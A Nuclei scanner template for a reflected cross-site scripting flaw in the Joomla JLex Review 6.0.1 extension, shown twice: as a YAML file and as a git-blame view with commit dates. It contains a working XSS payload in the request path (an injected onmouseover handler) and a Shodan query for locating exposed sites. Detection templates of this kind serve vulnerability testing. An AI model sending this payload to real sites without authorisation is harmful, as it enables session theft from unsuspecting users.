nuclei-templates/http/vulnerabilities/other/joomla-jlex-review-xss.yaml

id: joomla-jlex-xss

info:
  name: Joomla JLex Review 6.0.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39732
    - https://www.exploit-db.com/exploits/51645
    - https://extensions.joomla.org/extension/jlex-review/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1950415971
  tags: joomla,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<a href="/?itwed"onmouseover="confirm(document.domain)"style='
          - 'jlex-review'
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022006681bc6f208118e423f7af492847c7f417ade552263ea5a922277cdf1cb7fee022100fc7b6b98c7c4e5601c84ef6080f799e1441cb939c00f963bdba4276a8d8fc6b2:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: joomla-jlex-xss`

			`info:`
			`name: Joomla JLex Review 6.0.1 - Cross-Site Scripting`
			`author: r3Y3r53`
			`severity: medium`
			`description: \|`
			`The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.`
			`reference:`
			`- https://www.exploitalert.com/view-details.html?id=39732`
			`- https://www.exploit-db.com/exploits/51645`
			`- https://extensions.joomla.org/extension/jlex-review/`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`shodan-query: http.favicon.hash:-1950415971`
			`tags: joomla,xss`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1"`

fix weak matcher 2023-10-17 16:37:11 +00:00			`matchers-condition: and`
templates added 2023-10-17 07:20:28 +00:00			`matchers:`
fix weak matcher 2023-10-17 16:37:11 +00:00			`- type: word`
			`part: body`
			`words:`
			`- '<a href="/?itwed"onmouseover="confirm(document.domain)"style='`
			`- 'jlex-review'`
templates added 2023-10-17 07:20:28 +00:00			`condition: and`
fix weak matcher 2023-10-17 16:37:11 +00:00
			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022006681bc6f208118e423f7af492847c7f417ade552263ea5a922277cdf1cb7fee022100fc7b6b98c7c4e5601c84ef6080f799e1441cb939c00f963bdba4276a8d8fc6b2:922c64590222798bb761d5b6d8e72950`